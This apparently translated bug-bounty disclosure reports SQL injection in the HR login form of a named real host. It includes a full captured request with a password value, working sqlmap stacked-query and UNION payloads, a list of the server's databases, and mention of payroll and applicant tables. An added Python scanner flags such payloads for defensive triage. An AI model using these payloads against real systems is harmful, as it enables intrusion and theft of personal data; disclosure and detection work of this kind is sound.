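2015-12-18: Details reported to the vendor; awaiting vendor response
2015-12-18: Vendor confirmed; details disclosed to the vendor only
2015-12-28: Details disclosed to core white hats and experts in the relevant field
2016-01-07: Details disclosed to regular white hats
2016-01-17: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public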
POST /HR/LoginTo.aspx HTTP/1.1
Content-Length: 2583
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDCABDADDD=AMELIIPAGPFFMEGBLJGGOACJ; ASPSESSIONIDACADDADC=CBPLBNOAKCCIJBGGOMLMHMIN; ASP.NET_SessionId=b4fo3etcwb4xfls0stxndg2a
Host: gy.emaotai.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

btnlogin=&cbxOrgs=e&cbxOrgs%24DDD%24L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42%2c1_74%2c2_22%2c2_29%2c2_21%2c1_67%2c1_64%2c2_24%2c1_41%2c2_15&tbxPassword=g00dPa%24%24w0rD&UsersPanel%24cbxUsers=e&UsersPanel%24cbxUsers%24DDD%24L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM%2bskZ93r%2bLE0i79YMR0%2b6mT&__VIEWSTATE=[ViewState blob omitted]&__VIEWSTATEGENERATOR=CAB2EC08
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: UsersPanel_cbxUsers_VI (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: btnlogin=&cbxOrgs=e&cbxOrgs$DDD$L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42,1_74,2_22,2_29,2_21,1_67,1_64,2_24,1_41,2_15&tbxPassword=g00dPa$$w0rD&UsersPanel$cbxUsers=e&UsersPanel$cbxUsers$DDD$L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=1';WAITFOR DELAY '0:0:5'--&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM+skZ93r+LE0i79YMR0+6mT&__VIEWSTATE=[ViewState blob omitted]&__VIEWSTATEGENERATOR=CAB2EC08

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: btnlogin=&cbxOrgs=e&cbxOrgs$DDD$L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42,1_74,2_22,2_29,2_21,1_67,1_64,2_24,1_41,2_15&tbxPassword=g00dPa$$w0rD&UsersPanel$cbxUsers=e&UsersPanel$cbxUsers$DDD$L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=1' UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(113)+CHAR(74)+CHAR(70)+CHAR(88)+CHAR(99)+CHAR(77)+CHAR(83)+CHAR(78)+CHAR(69)+CHAR(73)+CHAR(76)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(122)+CHAR(113)-- &__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM+skZ93r+LE0i79YMR0+6mT&__VIEWSTATE=[ViewState blob omitted]&__VIEWSTATEGENERATOR=CAB2EC08
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
available databases [15]:
[*] DrpECO
[*] EA
[*] gy
[*] HR
[*] HRTest
[*] master
[*] model
[*] moutaiBak
[*] moutaiDev
[*] moutaiTest
[*] msdb
[*] QRTest
[*] rsda
[*] tempdb
[*] test
There are 15 databases in total; the current database is HR.
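A large amount of information is exposed. The table names follow no obvious naming convention, so I looked through a few tables:
The v_zlbt table, with records on the order of a million:
This appears to be payment information:
t_zp_da, job applicant information:
The HR database has more than 200 tables in total, so it certainly holds a great deal of information; I did not go through them one by one!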
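Added example, not part of the original report: a Python triage scan for captured WebForms POST bodies that flags the two payload classes sqlmap reported above (stacked queries with WAITFOR DELAY, UNION query) and any `_VI` field that is not a short identifier. The sample bodies are constructed and shortened from the request in the report; the `_VI` format rule and all function and constant names are assumptions.

```python
import re
from urllib.parse import parse_qsl

# WebForms state fields are opaque base64 by design; skip them.
STATE_FIELDS = {"__VIEWSTATE", "__EVENTVALIDATION", "__VIEWSTATEGENERATOR"}

# T-SQL constructs matching the two techniques sqlmap reported.
SQLI_PATTERNS = [
    ("stacked-query",
     re.compile(r";\s*(waitfor|exec|declare|select|insert|update|delete|drop)\b", re.I)),
    ("time-delay", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
]

# Assumption: *_VI fields hold a short alphanumeric identifier (98 and 1 in the report).
VALUE_INDEX = re.compile(r"[0-9A-Za-z]{0,16}")


def scan_form_body(body):
    """Return sorted (parameter, reason) findings for one urlencoded POST body."""
    findings = set()
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name in STATE_FIELDS:
            continue
        if name.endswith("_VI") and not VALUE_INDEX.fullmatch(value):
            findings.add((name, "malformed-value-index"))
        for reason, pattern in SQLI_PATTERNS:
            if pattern.search(value):
                findings.add((name, reason))
    return sorted(findings)


# Constructed sample bodies, shortened from the request in the report.
BENIGN = ("btnlogin=&cbxOrgs_VI=98&tbxPassword=g00dPa%24%24w0rD"
          "&UsersPanel%24cbxUsers%24DDD%24L=00000951&UsersPanel_cbxUsers_VI=1"
          "&__EVENTTARGET=&__VIEWSTATEGENERATOR=CAB2EC08")
STACKED = BENIGN.replace(
    "UsersPanel_cbxUsers_VI=1",
    "UsersPanel_cbxUsers_VI=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--")
UNION = BENIGN.replace(
    "UsersPanel_cbxUsers_VI=1",
    "UsersPanel_cbxUsers_VI=1%27+UNION+ALL+SELECT+NULL--")

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("stacked", STACKED), ("union", UNION)):
        print(label, scan_form_body(body))
```

Pattern matching of this kind only triages captured traffic; the remediation for the finding itself is to pass the UsersPanel_cbxUsers_VI value to SQL Server as a bound, typed query parameter.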
Severity: Medium
Vulnerability Rank: 8
Confirmed at: 2015-12-18 11:42
Thank you for your feedback; we will fix this as soon as possible.
None yet